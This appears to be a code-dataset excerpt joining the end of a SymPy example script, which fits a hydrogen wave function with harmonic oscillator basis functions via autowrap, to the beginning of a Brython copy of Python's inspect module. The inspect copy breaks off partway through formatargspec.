in the code for detailed explanations of the various steps. An
autowrapped sympy expression can be significantly faster than what you
would get by applying a sequence of the ufuncs shipped with numpy. [0]
We will find the coefficients needed to approximate a quantum mechanical
Hydrogen wave function in terms of harmonic oscillator solutions. For
the sake of demonstration, this will be done by setting up a simple
numerical integration scheme as a SymPy expression, and obtain a binary
implementation with autowrap.
You need to have numpy installed to run this example, as well as a
working fortran compiler. If you have pylab installed, you will be
rewarded with a nice plot in the end.
[0]:
http://ojensen.wordpress.com/2010/08/10/fast-ufunc-ish-hydrogen-solutions/
----
"""
import sys
from sympy.external import import_module
np = import_module('numpy')
if not np:
sys.exit("Cannot import numpy. Exiting.")
pylab = import_module('pylab', warn_not_installed=True)
from sympy.utilities.lambdify import implemented_function
from sympy.utilities.autowrap import autowrap, ufuncify
from sympy import Idx, IndexedBase, Lambda, pprint, Symbol, oo, Integral,\
Function
from sympy.physics.sho import R_nl
from sympy.physics.hydrogen import R_nl as hydro_nl
# ***************************************************************************
# calculation parameters to play with
# ***************************************************************************
basis_dimension = 5 # Size of h.o. basis (n < basis_dimension)
omega2 = 0.1 # in atomic units: twice the oscillator frequency
orbital_momentum_l = 1 # the quantum number `l` for angular momentum
hydrogen_n = 2 # the nodal quantum number for the Hydrogen wave
rmax = 20 # cut off in the radial direction
gridsize = 200 # number of points in the grid
# ***************************************************************************
def main():
print(__doc__)
# arrays are represented with IndexedBase, indices with Idx
m = Symbol('m', integer=True)
i = Idx('i', m)
A = IndexedBase('A')
B = IndexedBase('B')
x = Symbol('x')
print("Compiling ufuncs for radial harmonic oscillator solutions")
# setup a basis of ho-solutions (for l=0)
basis_ho = {}
for n in range(basis_dimension):
# Setup the radial ho solution for this n
expr = R_nl(n, orbital_momentum_l, omega2, x)
# Reduce the number of operations in the expression by eval to float
expr = expr.evalf(15)
print("The h.o. wave function with l = %i and n = %i is" % (
orbital_momentum_l, n))
pprint(expr)
# implement, compile and wrap it as a ufunc
basis_ho[n] = ufuncify(x, expr)
# now let's see if we can express a hydrogen radial wave in terms of
# the ho basis. Here's the solution we will approximate:
H_ufunc = ufuncify(x, hydro_nl(hydrogen_n, orbital_momentum_l, 1, x))
# The transformation to a different basis can be written like this,
#
# psi(r) = sum_i c(i) phi_i(r)
#
# where psi(r) is the hydrogen solution, phi_i(r) are the H.O. solutions
# and c(i) are scalar coefficients.
#
# So in order to express a hydrogen solution in terms of the H.O. basis, we
# need to determine the coefficients c(i). In position space, it means
# that we need to evaluate an integral:
#
# psi(r) = sum_i Integral(R**2*conj(phi(R))*psi(R), (R, 0, oo)) phi_i(r)
#
# To calculate the integral with autowrap, we notice that it contains an
# element-wise sum over all vectors. Using the Indexed class, it is
# possible to generate autowrapped functions that perform summations in
# the low-level code. (In fact, summations are very easy to create, and as
# we will see it is often necessary to take extra steps in order to avoid
# them.)
# we need one integration ufunc for each wave function in the h.o. basis
binary_integrator = {}
for n in range(basis_dimension):
#
# setup basis wave functions
#
# To get inline expressions in the low level code, we attach the
# wave function expressions to a regular SymPy function using the
# implemented_function utility. This is an extra step needed to avoid
# erronous summations in the wave function expressions.
#
# Such function objects carry around the expression they represent,
# but the expression is not exposed unless explicit measures are taken.
# The benefit is that the routines that searches for repeated indices
# in order to make contractions will not search through the wave
# function expression.
psi_ho = implemented_function('psi_ho',
Lambda(x, R_nl(n, orbital_momentum_l, omega2, x)))
# We represent the hydrogen function by an array which will be an input
# argument to the binary routine. This will let the integrators find
# h.o. basis coefficients for any wave function we throw at them.
psi = IndexedBase('psi')
#
# setup expression for the integration
#
step = Symbol('step') # use symbolic stepsize for flexibility
# let i represent an index of the grid array, and let A represent the
# grid array. Then we can approximate the integral by a sum over the
# following expression (simplified rectangular rule, ignoring end point
# corrections):
expr = A[i]**2*psi_ho(A[i])*psi[i]*step
if n == 0:
print("Setting up binary integrators for the integral:")
pprint(Integral(x**2*psi_ho(x)*Function('psi')(x), (x, 0, oo)))
# But it needs to be an operation on indexed objects, so that the code
# generators will recognize it correctly as an array.
# expr = expr.subs(x, A[i])
# Autowrap it. For functions that take more than one argument, it is
# a good idea to use the 'args' keyword so that you know the signature
# of the wrapped function. (The dimension m will be an optional
# argument, but it must be present in the args list.)
binary_integrator[n] = autowrap(expr, args=[A.label, psi.label, step, m])
# Lets see how it converges with the grid dimension
print("Checking convergence of integrator for n = %i" % n)
for g in range(3, 8):
grid, step = np.linspace(0, rmax, 2**g, retstep=True)
print("grid dimension %5i, integral = %e" % (2**g,
binary_integrator[n](grid, H_ufunc(grid), step)))
print("A binary integrator has been set up for each basis state")
print("We will now use them to reconstruct a hydrogen solution.")
# Note: We didn't need to specify grid or use gridsize before now
grid, stepsize = np.linspace(0, rmax, gridsize, retstep=True)
print("Calculating coefficients with gridsize = %i and stepsize %f" % (
len(grid), stepsize))
coeffs = {}
for n in range(basis_dimension):
coeffs[n] = binary_integrator[n](grid, H_ufunc(grid), stepsize)
print("c(%i) = %e" % (n, coeffs[n]))
print("Constructing the approximate hydrogen wave")
hydro_approx = 0
all_steps = {}
for n in range(basis_dimension):
hydro_approx += basis_ho[n](grid)*coeffs[n]
all_steps[n] = hydro_approx.copy()
if pylab:
line = pylab.plot(grid, all_steps[n], ':', label='max n = %i' % n)
# check error numerically
diff = np.max(np.abs(hydro_approx - H_ufunc(grid)))
print("Error estimate: the element with largest deviation misses by %f" % diff)
if diff > 0.01:
print("This is much, try to increase the basis size or adjust omega")
else:
print("Ah, that's a pretty good approximation!")
# Check visually
if pylab:
print("Here's a plot showing the contribution for each n")
line[0].set_linestyle('-')
pylab.plot(grid, H_ufunc(grid), 'r-', label='exact')
pylab.legend()
pylab.show()
print("""Note:
These binary integrators were specialized to find coefficients for a
harmonic oscillator basis, but they can process any wave function as long
as it is available as a vector and defined on a grid with equidistant
points. That is, on any grid you get from numpy.linspace.
To make the integrators even more flexible, you can setup the harmonic
oscillator solutions with symbolic parameters omega and l. Then the
autowrapped binary routine will take these scalar variables as arguments,
so that the integrators can find coefficients for *any* isotropic harmonic
oscillator basis.
""")
if __name__ == '__main__':
main()
| bsd-3-clause | -3,957,990,686,785,907,000 | 39.311111 | 83 | 0.642889 | false | 3.899398 | false | false | false |
2014c2g2/2014c2 | wsgi/static/Brython2.1.0-20140419-113919/Lib/inspect.py | 91 | 78882 | """Get useful information from live Python objects.
This module encapsulates the interface provided by the internal special
attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion.
It also provides some help for examining source code and class layout.
Here are some of the useful functions provided by this module:
ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),
isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),
isroutine() - check object types
getmembers() - get members of an object that satisfy a given condition
getfile(), getsourcefile(), getsource() - find an object's source code
getdoc(), getcomments() - get documentation on an object
getmodule() - determine the module that an object came from
getclasstree() - arrange classes so as to represent their hierarchy
getargspec(), getargvalues(), getcallargs() - get info about function arguments
getfullargspec() - same, with support for Python-3000 features
formatargspec(), formatargvalues() - format an argument spec
getouterframes(), getinnerframes() - get info about frames
currentframe() - get the current stack frame
stack(), trace() - get info about frames on the stack or in a traceback
signature() - get a Signature object for the callable
"""
# This module is in the public domain. No warranties.
__author__ = ('Ka-Ping Yee <[email protected]>',
'Yury Selivanov <[email protected]>')
import imp
import importlib.machinery
import itertools
import linecache
import os
import re
import sys
import tokenize
import types
import warnings
import functools
import builtins
from operator import attrgetter
from collections import namedtuple, OrderedDict
# Create constants for the compiler flags in Include/code.h
# We try to get them from dis to avoid duplication, but fall
# back to hardcoding so the dependency is optional
try:
from dis import COMPILER_FLAG_NAMES as _flag_names
except ImportError:
CO_OPTIMIZED, CO_NEWLOCALS = 0x1, 0x2
CO_VARARGS, CO_VARKEYWORDS = 0x4, 0x8
CO_NESTED, CO_GENERATOR, CO_NOFREE = 0x10, 0x20, 0x40
else:
mod_dict = globals()
for k, v in _flag_names.items():
mod_dict["CO_" + v] = k
# See Include/object.h
TPFLAGS_IS_ABSTRACT = 1 << 20
# ----------------------------------------------------------- type-checking
def ismodule(object):
"""Return true if the object is a module.
Module objects provide these attributes:
__cached__ pathname to byte compiled file
__doc__ documentation string
__file__ filename (missing for built-in modules)"""
return isinstance(object, types.ModuleType)
def isclass(object):
"""Return true if the object is a class.
Class objects provide these attributes:
__doc__ documentation string
__module__ name of module in which this class was defined"""
return isinstance(object, type)
def ismethod(object):
"""Return true if the object is an instance method.
Instance method objects provide these attributes:
__doc__ documentation string
__name__ name with which this method was defined
__func__ function object containing implementation of method
__self__ instance to which this method is bound"""
return isinstance(object, types.MethodType)
def ismethoddescriptor(object):
"""Return true if the object is a method descriptor.
But not if ismethod() or isclass() or isfunction() are true.
This is new in Python 2.2, and, for example, is true of int.__add__.
An object passing this test has a __get__ attribute but not a __set__
attribute, but beyond that the set of attributes varies. __name__ is
usually sensible, and __doc__ often is.
Methods implemented via descriptors that also pass one of the other
tests return false from the ismethoddescriptor() test, simply because
the other tests promise more -- you can, e.g., count on having the
__func__ attribute (etc) when an object passes ismethod()."""
if isclass(object) or ismethod(object) or isfunction(object):
# mutual exclusion
return False
tp = type(object)
return hasattr(tp, "__get__") and not hasattr(tp, "__set__")
def isdatadescriptor(object):
"""Return true if the object is a data descriptor.
Data descriptors have both a __get__ and a __set__ attribute. Examples are
properties (defined in Python) and getsets and members (defined in C).
Typically, data descriptors will also have __name__ and __doc__ attributes
(properties, getsets, and members have both of these attributes), but this
is not guaranteed."""
if isclass(object) or ismethod(object) or isfunction(object):
# mutual exclusion
return False
tp = type(object)
return hasattr(tp, "__set__") and hasattr(tp, "__get__")
if hasattr(types, 'MemberDescriptorType'):
# CPython and equivalent
def ismemberdescriptor(object):
"""Return true if the object is a member descriptor.
Member descriptors are specialized descriptors defined in extension
modules."""
return isinstance(object, types.MemberDescriptorType)
else:
# Other implementations
def ismemberdescriptor(object):
"""Return true if the object is a member descriptor.
Member descriptors are specialized descriptors defined in extension
modules."""
return False
if hasattr(types, 'GetSetDescriptorType'):
# CPython and equivalent
def isgetsetdescriptor(object):
"""Return true if the object is a getset descriptor.
getset descriptors are specialized descriptors defined in extension
modules."""
return isinstance(object, types.GetSetDescriptorType)
else:
# Other implementations
def isgetsetdescriptor(object):
"""Return true if the object is a getset descriptor.
getset descriptors are specialized descriptors defined in extension
modules."""
return False
def isfunction(object):
"""Return true if the object is a user-defined function.
Function objects provide these attributes:
__doc__ documentation string
__name__ name with which this function was defined
__code__ code object containing compiled function bytecode
__defaults__ tuple of any default values for arguments
__globals__ global namespace in which this function was defined
__annotations__ dict of parameter annotations
__kwdefaults__ dict of keyword only parameters with defaults"""
return isinstance(object, types.FunctionType)
def isgeneratorfunction(object):
"""Return true if the object is a user-defined generator function.
Generator function objects provides same attributes as functions.
See help(isfunction) for attributes listing."""
return bool((isfunction(object) or ismethod(object)) and
object.__code__.co_flags & CO_GENERATOR)
def isgenerator(object):
"""Return true if the object is a generator.
Generator objects provide these attributes:
__iter__ defined to support iteration over container
close raises a new GeneratorExit exception inside the
generator to terminate the iteration
gi_code code object
gi_frame frame object or possibly None once the generator has
been exhausted
gi_running set to 1 when generator is executing, 0 otherwise
next return the next item from the container
send resumes the generator and "sends" a value that becomes
the result of the current yield-expression
throw used to raise an exception inside the generator"""
return isinstance(object, types.GeneratorType)
def istraceback(object):
"""Return true if the object is a traceback.
Traceback objects provide these attributes:
tb_frame frame object at this level
tb_lasti index of last attempted instruction in bytecode
tb_lineno current line number in Python source code
tb_next next inner traceback object (called by this level)"""
return isinstance(object, types.TracebackType)
def isframe(object):
"""Return true if the object is a frame object.
Frame objects provide these attributes:
f_back next outer frame object (this frame's caller)
f_builtins built-in namespace seen by this frame
f_code code object being executed in this frame
f_globals global namespace seen by this frame
f_lasti index of last attempted instruction in bytecode
f_lineno current line number in Python source code
f_locals local namespace seen by this frame
f_trace tracing function for this frame, or None"""
return isinstance(object, types.FrameType)
def iscode(object):
"""Return true if the object is a code object.
Code objects provide these attributes:
co_argcount number of arguments (not including * or ** args)
co_code string of raw compiled bytecode
co_consts tuple of constants used in the bytecode
co_filename name of file in which this code object was created
co_firstlineno number of first line in Python source code
co_flags bitmap: 1=optimized | 2=newlocals | 4=*arg | 8=**arg
co_lnotab encoded mapping of line numbers to bytecode indices
co_name name with which this code object was defined
co_names tuple of names of local variables
co_nlocals number of local variables
co_stacksize virtual machine stack space required
co_varnames tuple of names of arguments and local variables"""
return isinstance(object, types.CodeType)
def isbuiltin(object):
"""Return true if the object is a built-in function or method.
Built-in functions and methods provide these attributes:
__doc__ documentation string
__name__ original name of this function or method
__self__ instance to which a method is bound, or None"""
return isinstance(object, types.BuiltinFunctionType)
def isroutine(object):
"""Return true if the object is any kind of function or method."""
return (isbuiltin(object)
or isfunction(object)
or ismethod(object)
or ismethoddescriptor(object))
def isabstract(object):
"""Return true if the object is an abstract base class (ABC)."""
return bool(isinstance(object, type) and object.__flags__ & TPFLAGS_IS_ABSTRACT)
def getmembers(object, predicate=None):
"""Return all members of an object as (name, value) pairs sorted by name.
Optionally, only return members that satisfy a given predicate."""
if isclass(object):
mro = (object,) + getmro(object)
else:
mro = ()
results = []
for key in dir(object):
# First try to get the value via __dict__. Some descriptors don't
# like calling their __get__ (see bug #1785).
for base in mro:
if key in base.__dict__:
value = base.__dict__[key]
break
else:
try:
value = getattr(object, key)
except AttributeError:
continue
if not predicate or predicate(value):
results.append((key, value))
results.sort()
return results
Attribute = namedtuple('Attribute', 'name kind defining_class object')
def classify_class_attrs(cls):
"""Return list of attribute-descriptor tuples.
For each name in dir(cls), the return list contains a 4-tuple
with these elements:
0. The name (a string).
1. The kind of attribute this is, one of these strings:
'class method' created via classmethod()
'static method' created via staticmethod()
'property' created via property()
'method' any other flavor of method
'data' not a method
2. The class which defined this attribute (a class).
3. The object as obtained directly from the defining class's
__dict__, not via getattr. This is especially important for
data attributes: C.data is just a data object, but
C.__dict__['data'] may be a data descriptor with additional
info, like a __doc__ string.
"""
mro = getmro(cls)
names = dir(cls)
result = []
for name in names:
# Get the object associated with the name, and where it was defined.
# Getting an obj from the __dict__ sometimes reveals more than
# using getattr. Static and class methods are dramatic examples.
# Furthermore, some objects may raise an Exception when fetched with
# getattr(). This is the case with some descriptors (bug #1785).
# Thus, we only use getattr() as a last resort.
homecls = None
for base in (cls,) + mro:
if name in base.__dict__:
obj = base.__dict__[name]
homecls = base
break
else:
obj = getattr(cls, name)
homecls = getattr(obj, "__objclass__", homecls)
# Classify the object.
if isinstance(obj, staticmethod):
kind = "static method"
elif isinstance(obj, classmethod):
kind = "class method"
elif isinstance(obj, property):
kind = "property"
elif ismethoddescriptor(obj):
kind = "method"
elif isdatadescriptor(obj):
kind = "data"
else:
obj_via_getattr = getattr(cls, name)
if (isfunction(obj_via_getattr) or
ismethoddescriptor(obj_via_getattr)):
kind = "method"
else:
kind = "data"
obj = obj_via_getattr
result.append(Attribute(name, kind, homecls, obj))
return result
# ----------------------------------------------------------- class helpers
def getmro(cls):
"Return tuple of base classes (including cls) in method resolution order."
return cls.__mro__
# -------------------------------------------------- source code extraction
def indentsize(line):
"""Return the indent size, in spaces, at the start of a line of text."""
expline = line.expandtabs()
return len(expline) - len(expline.lstrip())
def getdoc(object):
"""Get the documentation string for an object.
All tabs are expanded to spaces. To clean up docstrings that are
indented to line up with blocks of code, any whitespace than can be
uniformly removed from the second line onwards is removed."""
try:
doc = object.__doc__
except AttributeError:
return None
if not isinstance(doc, str):
return None
return cleandoc(doc)
def cleandoc(doc):
"""Clean up indentation from docstrings.
Any whitespace that can be uniformly removed from the second line
onwards is removed."""
try:
lines = doc.expandtabs().split('\n')
except UnicodeError:
return None
else:
# Find minimum indentation of any non-blank lines after first line.
margin = sys.maxsize
for line in lines[1:]:
content = len(line.lstrip())
if content:
indent = len(line) - content
margin = min(margin, indent)
# Remove indentation.
if lines:
lines[0] = lines[0].lstrip()
if margin < sys.maxsize:
for i in range(1, len(lines)): lines[i] = lines[i][margin:]
# Remove any trailing or leading blank lines.
while lines and not lines[-1]:
lines.pop()
while lines and not lines[0]:
lines.pop(0)
return '\n'.join(lines)
def getfile(object):
"""Work out which source or compiled file an object was defined in."""
if ismodule(object):
if hasattr(object, '__file__'):
return object.__file__
raise TypeError('{!r} is a built-in module'.format(object))
if isclass(object):
object = sys.modules.get(object.__module__)
if hasattr(object, '__file__'):
return object.__file__
raise TypeError('{!r} is a built-in class'.format(object))
if ismethod(object):
object = object.__func__
if isfunction(object):
object = object.__code__
if istraceback(object):
object = object.tb_frame
if isframe(object):
object = object.f_code
if iscode(object):
return object.co_filename
raise TypeError('{!r} is not a module, class, method, '
'function, traceback, frame, or code object'.format(object))
ModuleInfo = namedtuple('ModuleInfo', 'name suffix mode module_type')
def getmoduleinfo(path):
"""Get the module name, suffix, mode, and module type for a given file."""
warnings.warn('inspect.getmoduleinfo() is deprecated', DeprecationWarning,
2)
filename = os.path.basename(path)
suffixes = [(-len(suffix), suffix, mode, mtype)
for suffix, mode, mtype in imp.get_suffixes()]
suffixes.sort() # try longest suffixes first, in case they overlap
for neglen, suffix, mode, mtype in suffixes:
if filename[neglen:] == suffix:
return ModuleInfo(filename[:neglen], suffix, mode, mtype)
def getmodulename(path):
"""Return the module name for a given file, or None."""
fname = os.path.basename(path)
# Check for paths that look like an actual module file
suffixes = [(-len(suffix), suffix)
for suffix in importlib.machinery.all_suffixes()]
suffixes.sort() # try longest suffixes first, in case they overlap
for neglen, suffix in suffixes:
if fname.endswith(suffix):
return fname[:neglen]
return None
def getsourcefile(object):
"""Return the filename that can be used to locate an object's source.
Return None if no way can be identified to get the source.
"""
filename = getfile(object)
all_bytecode_suffixes = importlib.machinery.DEBUG_BYTECODE_SUFFIXES[:]
all_bytecode_suffixes += importlib.machinery.OPTIMIZED_BYTECODE_SUFFIXES[:]
if any(filename.endswith(s) for s in all_bytecode_suffixes):
filename = (os.path.splitext(filename)[0] +
importlib.machinery.SOURCE_SUFFIXES[0])
elif any(filename.endswith(s) for s in
importlib.machinery.EXTENSION_SUFFIXES):
return None
if os.path.exists(filename):
return filename
# only return a non-existent filename if the module has a PEP 302 loader
if hasattr(getmodule(object, filename), '__loader__'):
return filename
# or it is in the linecache
if filename in linecache.cache:
return filename
def getabsfile(object, _filename=None):
"""Return an absolute path to the source or compiled file for an object.
The idea is for each object to have a unique origin, so this routine
normalizes the result as much as possible."""
if _filename is None:
_filename = getsourcefile(object) or getfile(object)
return os.path.normcase(os.path.abspath(_filename))
modulesbyfile = {}
_filesbymodname = {}
def getmodule(object, _filename=None):
"""Return the module an object was defined in, or None if not found."""
if ismodule(object):
return object
if hasattr(object, '__module__'):
return sys.modules.get(object.__module__)
# Try the filename to modulename cache
if _filename is not None and _filename in modulesbyfile:
return sys.modules.get(modulesbyfile[_filename])
# Try the cache again with the absolute file name
try:
file = getabsfile(object, _filename)
except TypeError:
return None
if file in modulesbyfile:
return sys.modules.get(modulesbyfile[file])
# Update the filename to module name cache and check yet again
# Copy sys.modules in order to cope with changes while iterating
for modname, module in list(sys.modules.items()):
if ismodule(module) and hasattr(module, '__file__'):
f = module.__file__
if f == _filesbymodname.get(modname, None):
# Have already mapped this module, so skip it
continue
_filesbymodname[modname] = f
f = getabsfile(module)
# Always map to the name the module knows itself by
modulesbyfile[f] = modulesbyfile[
os.path.realpath(f)] = module.__name__
if file in modulesbyfile:
return sys.modules.get(modulesbyfile[file])
# Check the main module
main = sys.modules['__main__']
if not hasattr(object, '__name__'):
return None
if hasattr(main, object.__name__):
mainobject = getattr(main, object.__name__)
if mainobject is object:
return main
# Check builtins
builtin = sys.modules['builtins']
if hasattr(builtin, object.__name__):
builtinobject = getattr(builtin, object.__name__)
if builtinobject is object:
return builtin
def findsource(object):
"""Return the entire source file and starting line number for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a list of all the lines
in the file and the line number indexes a line in that list. An IOError
is raised if the source code cannot be retrieved."""
file = getfile(object)
sourcefile = getsourcefile(object)
if not sourcefile and file[:1] + file[-1:] != '<>':
raise IOError('source code not available')
file = sourcefile if sourcefile else file
module = getmodule(object, file)
if module:
lines = linecache.getlines(file, module.__dict__)
else:
lines = linecache.getlines(file)
if not lines:
raise IOError('could not get source code')
if ismodule(object):
return lines, 0
if isclass(object):
name = object.__name__
pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
# make some effort to find the best matching class definition:
# use the one with the least indentation, which is the one
# that's most probably not inside a function definition.
candidates = []
for i in range(len(lines)):
match = pat.match(lines[i])
if match:
# if it's at toplevel, it's already the best one
if lines[i][0] == 'c':
return lines, i
# else add whitespace to candidate list
candidates.append((match.group(1), i))
if candidates:
# this will sort by whitespace, and by line number,
# less whitespace first
candidates.sort()
return lines, candidates[0][1]
else:
raise IOError('could not find class definition')
if ismethod(object):
object = object.__func__
if isfunction(object):
object = object.__code__
if istraceback(object):
object = object.tb_frame
if isframe(object):
object = object.f_code
if iscode(object):
if not hasattr(object, 'co_firstlineno'):
raise IOError('could not find function definition')
lnum = object.co_firstlineno - 1
pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
while lnum > 0:
if pat.match(lines[lnum]): break
lnum = lnum - 1
return lines, lnum
raise IOError('could not find code object')
def getcomments(object):
"""Get lines of comments immediately preceding an object's source code.
Returns None when source can't be found.
"""
try:
lines, lnum = findsource(object)
except (IOError, TypeError):
return None
if ismodule(object):
# Look for a comment block at the top of the file.
start = 0
if lines and lines[0][:2] == '#!': start = 1
while start < len(lines) and lines[start].strip() in ('', '#'):
start = start + 1
if start < len(lines) and lines[start][:1] == '#':
comments = []
end = start
while end < len(lines) and lines[end][:1] == '#':
comments.append(lines[end].expandtabs())
end = end + 1
return ''.join(comments)
# Look for a preceding block of comments at the same indentation.
elif lnum > 0:
indent = indentsize(lines[lnum])
end = lnum - 1
if end >= 0 and lines[end].lstrip()[:1] == '#' and \
indentsize(lines[end]) == indent:
comments = [lines[end].expandtabs().lstrip()]
if end > 0:
end = end - 1
comment = lines[end].expandtabs().lstrip()
while comment[:1] == '#' and indentsize(lines[end]) == indent:
comments[:0] = [comment]
end = end - 1
if end < 0: break
comment = lines[end].expandtabs().lstrip()
while comments and comments[0].strip() == '#':
comments[:1] = []
while comments and comments[-1].strip() == '#':
comments[-1:] = []
return ''.join(comments)
class EndOfBlock(Exception): pass
class BlockFinder:
"""Provide a tokeneater() method to detect the end of a code block."""
def __init__(self):
self.indent = 0
self.islambda = False
self.started = False
self.passline = False
self.last = 1
def tokeneater(self, type, token, srowcol, erowcol, line):
if not self.started:
# look for the first "def", "class" or "lambda"
if token in ("def", "class", "lambda"):
if token == "lambda":
self.islambda = True
self.started = True
self.passline = True # skip to the end of the line
elif type == tokenize.NEWLINE:
self.passline = False # stop skipping when a NEWLINE is seen
self.last = srowcol[0]
if self.islambda: # lambdas always end at the first NEWLINE
raise EndOfBlock
elif self.passline:
pass
elif type == tokenize.INDENT:
self.indent = self.indent + 1
self.passline = True
elif type == tokenize.DEDENT:
self.indent = self.indent - 1
# the end of matching indent/dedent pairs end a block
# (note that this only works for "def"/"class" blocks,
# not e.g. for "if: else:" or "try: finally:" blocks)
if self.indent <= 0:
raise EndOfBlock
elif self.indent == 0 and type not in (tokenize.COMMENT, tokenize.NL):
# any other token on the same indentation level end the previous
# block as well, except the pseudo-tokens COMMENT and NL.
raise EndOfBlock
def getblock(lines):
"""Extract the block of code at the top of the given list of lines."""
blockfinder = BlockFinder()
try:
tokens = tokenize.generate_tokens(iter(lines).__next__)
for _token in tokens:
blockfinder.tokeneater(*_token)
except (EndOfBlock, IndentationError):
pass
return lines[:blockfinder.last]
def getsourcelines(object):
"""Return a list of source lines and starting line number for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a list of the lines
corresponding to the object and the line number indicates where in the
original source file the first line of code was found. An IOError is
raised if the source code cannot be retrieved."""
lines, lnum = findsource(object)
if ismodule(object): return lines, 0
else: return getblock(lines[lnum:]), lnum + 1
def getsource(object):
"""Return the text of the source code for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a single string. An
IOError is raised if the source code cannot be retrieved."""
lines, lnum = getsourcelines(object)
return ''.join(lines)
# --------------------------------------------------- class tree extraction
def walktree(classes, children, parent):
"""Recursive helper function for getclasstree()."""
results = []
classes.sort(key=attrgetter('__module__', '__name__'))
for c in classes:
results.append((c, c.__bases__))
if c in children:
results.append(walktree(children[c], children, c))
return results
def getclasstree(classes, unique=False):
"""Arrange the given list of classes into a hierarchy of nested lists.
Where a nested list appears, it contains classes derived from the class
whose entry immediately precedes the list. Each entry is a 2-tuple
containing a class and a tuple of its base classes. If the 'unique'
argument is true, exactly one entry appears in the returned structure
for each class in the given list. Otherwise, classes using multiple
inheritance and their descendants will appear multiple times."""
children = {}
roots = []
for c in classes:
if c.__bases__:
for parent in c.__bases__:
if not parent in children:
children[parent] = []
if c not in children[parent]:
children[parent].append(c)
if unique and parent in classes: break
elif c not in roots:
roots.append(c)
for parent in children:
if parent not in classes:
roots.append(parent)
return walktree(roots, children, None)
# ------------------------------------------------ argument list extraction
Arguments = namedtuple('Arguments', 'args, varargs, varkw')
def getargs(co):
"""Get information about the arguments accepted by a code object.
Three things are returned: (args, varargs, varkw), where
'args' is the list of argument names. Keyword-only arguments are
appended. 'varargs' and 'varkw' are the names of the * and **
arguments or None."""
args, varargs, kwonlyargs, varkw = _getfullargs(co)
return Arguments(args + kwonlyargs, varargs, varkw)
def _getfullargs(co):
"""Get information about the arguments accepted by a code object.
Four things are returned: (args, varargs, kwonlyargs, varkw), where
'args' and 'kwonlyargs' are lists of argument names, and 'varargs'
and 'varkw' are the names of the * and ** arguments or None."""
if not iscode(co):
raise TypeError('{!r} is not a code object'.format(co))
nargs = co.co_argcount
names = co.co_varnames
nkwargs = co.co_kwonlyargcount
args = list(names[:nargs])
kwonlyargs = list(names[nargs:nargs+nkwargs])
step = 0
nargs += nkwargs
varargs = None
if co.co_flags & CO_VARARGS:
varargs = co.co_varnames[nargs]
nargs = nargs + 1
varkw = None
if co.co_flags & CO_VARKEYWORDS:
varkw = co.co_varnames[nargs]
return args, varargs, kwonlyargs, varkw
ArgSpec = namedtuple('ArgSpec', 'args varargs keywords defaults')
def getargspec(func):
"""Get the names and default values of a function's arguments.
A tuple of four things is returned: (args, varargs, varkw, defaults).
'args' is a list of the argument names.
'args' will include keyword-only argument names.
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'defaults' is an n-tuple of the default values of the last n arguments.
Use the getfullargspec() API for Python-3000 code, as annotations
and keyword arguments are supported. getargspec() will raise ValueError
if the func has either annotations or keyword arguments.
"""
args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, ann = \
getfullargspec(func)
if kwonlyargs or ann:
raise ValueError("Function has keyword-only arguments or annotations"
", use getfullargspec() API which can support them")
return ArgSpec(args, varargs, varkw, defaults)
FullArgSpec = namedtuple('FullArgSpec',
'args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations')
def getfullargspec(func):
"""Get the names and default values of a function's arguments.
A tuple of seven things is returned:
(args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults annotations).
'args' is a list of the argument names.
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'defaults' is an n-tuple of the default values of the last n arguments.
'kwonlyargs' is a list of keyword-only argument names.
'kwonlydefaults' is a dictionary mapping names from kwonlyargs to defaults.
'annotations' is a dictionary mapping argument names to annotations.
The first four items in the tuple correspond to getargspec().
"""
if ismethod(func):
func = func.__func__
if not isfunction(func):
raise TypeError('{!r} is not a Python function'.format(func))
args, varargs, kwonlyargs, varkw = _getfullargs(func.__code__)
return FullArgSpec(args, varargs, varkw, func.__defaults__,
kwonlyargs, func.__kwdefaults__, func.__annotations__)
ArgInfo = namedtuple('ArgInfo', 'args varargs keywords locals')
def getargvalues(frame):
"""Get information about arguments passed into a particular frame.
A tuple of four things is returned: (args, varargs, varkw, locals).
'args' is a list of the argument names.
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'locals' is the locals dictionary of the given frame."""
args, varargs, varkw = getargs(frame.f_code)
return ArgInfo(args, varargs, varkw, frame.f_locals)
def formatannotation(annotation, base_module=None):
if isinstance(annotation, type):
if annotation.__module__ in ('builtins', base_module):
return annotation.__name__
return annotation.__module__+'.'+annotation.__name__
return repr(annotation)
def formatannotationrelativeto(object):
module = getattr(object, '__module__', None)
def _formatannotation(annotation):
return formatannotation(annotation, module)
return _formatannotation
def formatargspec(args, varargs=None, varkw=None, defaults=None,
kwonlyargs=(), kwonlydefaults={}, annotations={},
formatarg=str,
formatvarargs=lambda name: '*' + name,
formatvarkw=lambda name: '**' + name,
formatvalue=lambda value: '=' + repr(value),
formatreturns=lambda text: ' -> ' + text,
formatannotation=formatannotation):
"""Format an argument spec from the values returned by getargspec
or getfullargspec.
The first seven arguments are (args, varargs, varkw, defaults,
kwonlyargs, kwonlydefaults, annotations). The other five arguments
are the corresponding optional formatting functions that are called to
turn names and values into strings. The last argument is an optional
function to format the sequence of arguments."""
def formatargandannotation(arg):
result = formatarg(arg)
if arg in annotations:
result += ': ' + formatannotation(annotations[arg])
return result
specs = []
if defaults:
firstdefault = len(args) - len(defaults)
for i, arg in enumerate(args):
spec = formatargandannotation(arg)
if defaults and i >= firstdefault:
spec = spec + formatvalue(defaults[i - firstdefault])
specs.append(spec)
if varargs is not None:
specs.append(formatvarargs(formatargandannotation(varargs)))
else:
if kwonlyargs:
specs.append('*')
if kwonlyargs:
for kwonlyarg in kwonlyargs:
spec = formatargandannotation(kwonlyarg)
if kwonlydefaults and kwonlyarg in kwonlydefaults:
spec += formatvalue(kwonlydefaults[kwonlyarg])
specs.append(spec)
if varkw is not None:
